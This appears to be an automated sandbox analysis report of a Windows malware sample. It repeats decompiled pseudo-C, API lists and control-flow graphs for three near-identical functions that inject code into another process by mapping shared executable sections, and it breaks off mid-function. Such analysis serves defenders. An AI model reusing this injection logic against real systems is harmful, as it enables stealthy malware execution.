                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                            • Instruction ID: 8306347d173e952d8899d3997cb349dcf7f01c905c4505a4b1f9f6e7b55dad69
                            • Opcode Fuzzy Hash: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                            • Instruction Fuzzy Hash: 7E5119B0900245BFEB209F91CC48FEBBBB8EF85700F14416AF911BB2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015EE Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 186 4015ee-4015ef 188 401603 186->188 189 4015f4-40162b call 401274 186->189 188->189 196 401630-401635 189->196 197 40162d 189->197 199 401956-40195e 196->199 200 40163b-40164c 196->200 197->196 199->196 203 401963-4019b3 call 401274 199->203 204 401652-40167b 200->204 205 401954 200->205 204->205 212 401681-401698 NtDuplicateObject 204->212 205->203 212->205 214 40169e-4016c2 NtCreateSection 212->214 216 4016c4-4016e5 NtMapViewOfSection 214->216 217 40171e-401744 NtCreateSection 214->217 216->217 220 4016e7-401703 NtMapViewOfSection 216->220 217->205 221 40174a-40174e 217->221 220->217 222 401705-40171b 220->222 221->205 223 401754-401775 NtMapViewOfSection 221->223 222->217 223->205 226 40177b-401797 NtMapViewOfSection 223->226 226->205 229 40179d call 4017a2 226->229
                            C-Code - Quality: 58%
                            			E004015EE(void* __esi, void* __eflags) {
				void* _t85;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t132;
				signed int _t139;
				int _t140;
				void* _t157;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				intOrPtr _t180;
				void* _t181;
				void* _t182;
				HANDLE* _t188;
				HANDLE* _t190;
				void* _t195;
				intOrPtr* _t198;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t209;
				long _t224;

				asm("lodsd");
				_push(0x392);
				_t205 = _t204 + 4;
				L00401274(_t85, 0xf1, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
				_t188 = _t202 - 0x60;
				 *_t188 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
				_t91 =  *_t188;
				if(_t91 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t91;
					_t132[1] = 0;
					_t188 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
					 *_t188 = 0x18;
					_push(_t202 - 0x30);
					_push(_t188);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t202 - 8)) = 0;
						_t99 = _t202 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t190 = _t202 - 0x54;
						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t122 = _t202 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t202 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
								}
							}
						}
						_t101 = _t202 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t103 = _t202 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t202 - 0x40;
								 *_t105 = 0;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
								if(_t224 == 0) {
									L22();
									if(_t224 == 0 && _t224 != 0) {
										asm("hlt");
										_push(_t205);
									}
									_push(0x2ea6);
									_t209 = _t205 + 4;
									_t161 = 0x2260;
									_t162 = _t161 << 5;
									_t163 = _t162 + 0x2260;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc4");
									_t165 = _t164 ^ 0xad610a21;
									_t205 = _t209 - _t165;
									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t195 + 6) & 0x0000ffff;
									_push(_t195);
									_t166 = _t195;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t167 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t205 = _t205 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t188);
									_t228 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t188);
										_t170 = _t188[0xd] -  *(_t202 - 0x40);
										_t198 = _t188[0x28] +  *(_t202 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t180 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t170;
												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t188);
										__eflags = 0;
										_t109 = _t202 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
									} else {
										L55();
										_pop(_t181);
										_t182 = _t181 - 0x1892;
										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
										L004012E3(_t128, _t228);
										0x33(_t182 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t205;
				_push(0x392);
				_t157 = 0xf1;
				return L00401274(_t92, _t157, _t188, _t228);
			}








































                            0x004015ee
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                            • Instruction ID: 6c2b391f055ddb0142fb10ad77502f624f49f79eb41efd18acee614c01c4bb16
                            • Opcode Fuzzy Hash: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                            • Instruction Fuzzy Hash: CF5109B4900245BFEF219F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401602 Relevance: 10.7, APIs: 7, Instructions: 169nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 231 401602-40162b call 401274 240 401630-401635 231->240 241 40162d 231->241 243 401956-40195e 240->243 244 40163b-40164c 240->244 241->240 243->240 247 401963-4019b3 call 401274 243->247 248 401652-40167b 244->248 249 401954 244->249 248->249 256 401681-401698 NtDuplicateObject 248->256 249->247 256->249 258 40169e-4016c2 NtCreateSection 256->258 260 4016c4-4016e5 NtMapViewOfSection 258->260 261 40171e-401744 NtCreateSection 258->261 260->261 264 4016e7-401703 NtMapViewOfSection 260->264 261->249 265 40174a-40174e 261->265 264->261 266 401705-40171b 264->266 265->249 267 401754-401775 NtMapViewOfSection 265->267 266->261 267->249 270 40177b-401797 NtMapViewOfSection 267->270 270->249 273 40179d call 4017a2 270->273
                            C-Code - Quality: 58%
                            			E00401602(void* __esi, void* __eflags) {
				void* _t85;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t132;
				signed int _t139;
				int _t140;
				void* _t157;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				intOrPtr _t180;
				void* _t181;
				void* _t182;
				HANDLE* _t188;
				HANDLE* _t190;
				void* _t195;
				intOrPtr* _t198;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t209;
				long _t224;

				asm("outsb");
				_push(0x392);
				_t205 = _t204 + 4;
				L00401274(_t85, 0xf1, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
				_t188 = _t202 - 0x60;
				 *_t188 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
				_t91 =  *_t188;
				if(_t91 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t91;
					_t132[1] = 0;
					_t188 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
					 *_t188 = 0x18;
					_push(_t202 - 0x30);
					_push(_t188);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t202 - 8)) = 0;
						_t99 = _t202 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t190 = _t202 - 0x54;
						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t122 = _t202 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t202 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
								}
							}
						}
						_t101 = _t202 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t103 = _t202 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t202 - 0x40;
								 *_t105 = 0;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
										asm("hlt");
										_push(_t205);
									}
									_push(0x2ea6);
									_t209 = _t205 + 4;
									_t161 = 0x2260;
									_t162 = _t161 << 5;
									_t163 = _t162 + 0x2260;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc4");
									_t165 = _t164 ^ 0xad610a21;
									_t205 = _t209 - _t165;
									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t195 + 6) & 0x0000ffff;
									_push(_t195);
									_t166 = _t195;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t167 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t205 = _t205 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t188);
									_t228 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t188);
										_t170 = _t188[0xd] -  *(_t202 - 0x40);
										_t198 = _t188[0x28] +  *(_t202 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t180 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t170;
												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t188);
										__eflags = 0;
										_t109 = _t202 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
									} else {
										L54();
										_pop(_t181);
										_t182 = _t181 - 0x1892;
										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
										L004012E3(_t128, _t228);
										0x33(_t182 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t205;
				_push(0x392);
				_t157 = 0xf1;
				return L00401274(_t92, _t157, _t188, _t228);
			}








































                            0x00401602
                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                            • Instruction ID: ddd3f8d359e1be272fa8e6b980a73181fe92d2cf62f6648a3517e1c41251e5f0
                            • Opcode Fuzzy Hash: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                            • Instruction Fuzzy Hash: 4C5108B4900245BBEF209F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401605 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 275 401605-40162b call 401274 282 401630-401635 275->282 283 40162d 275->283 285 401956-40195e 282->285 286 40163b-40164c 282->286 283->282 285->282 289 401963-4019b3 call 401274 285->289 290 401652-40167b 286->290 291 401954 286->291 290->291 298 401681-401698 NtDuplicateObject 290->298 291->289 298->291 300 40169e-4016c2 NtCreateSection 298->300 302 4016c4-4016e5 NtMapViewOfSection 300->302 303 40171e-401744 NtCreateSection 300->303 302->303 306 4016e7-401703 NtMapViewOfSection 302->306 303->291 307 40174a-40174e 303->307 306->303 308 401705-40171b 306->308 307->291 309 401754-401775 NtMapViewOfSection 307->309 308->303 309->291 312 40177b-401797 NtMapViewOfSection 309->312 312->291 315 40179d call 4017a2 312->315
                            C-Code - Quality: 58%
                            			E00401605(void* __esi, void* __eflags) {
				void* _t85;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t131;
				signed int _t138;
				int _t139;
				void* _t156;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t165;
				intOrPtr* _t166;
				void* _t169;
				intOrPtr _t179;
				void* _t180;
				void* _t181;
				HANDLE* _t187;
				HANDLE* _t189;
				void* _t194;
				intOrPtr* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				void* _t207;
				long _t222;

				asm("scasb");
				L00401274(_t85, 0xf1, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
				_t187 = _t201 - 0x60;
				 *_t187 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
				_t91 =  *_t187;
				if(_t91 != 0) {
					_t131 = _t201 - 0x30;
					 *_t131 = _t91;
					_t131[1] = 0;
					_t187 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t201 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t201 - 8)) = 0;
						_t99 = _t201 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t189 = _t201 - 0x54;
						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t122 = _t201 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t201 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
								}
							}
						}
						_t101 = _t201 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t103 = _t201 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t201 - 0x40;
								 *_t105 = 0;
								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
								if(_t222 == 0) {
									L19();
									if(_t222 == 0 && _t222 != 0) {
										asm("hlt");
										_push(_t203);
									}
									_push(0x2ea6);
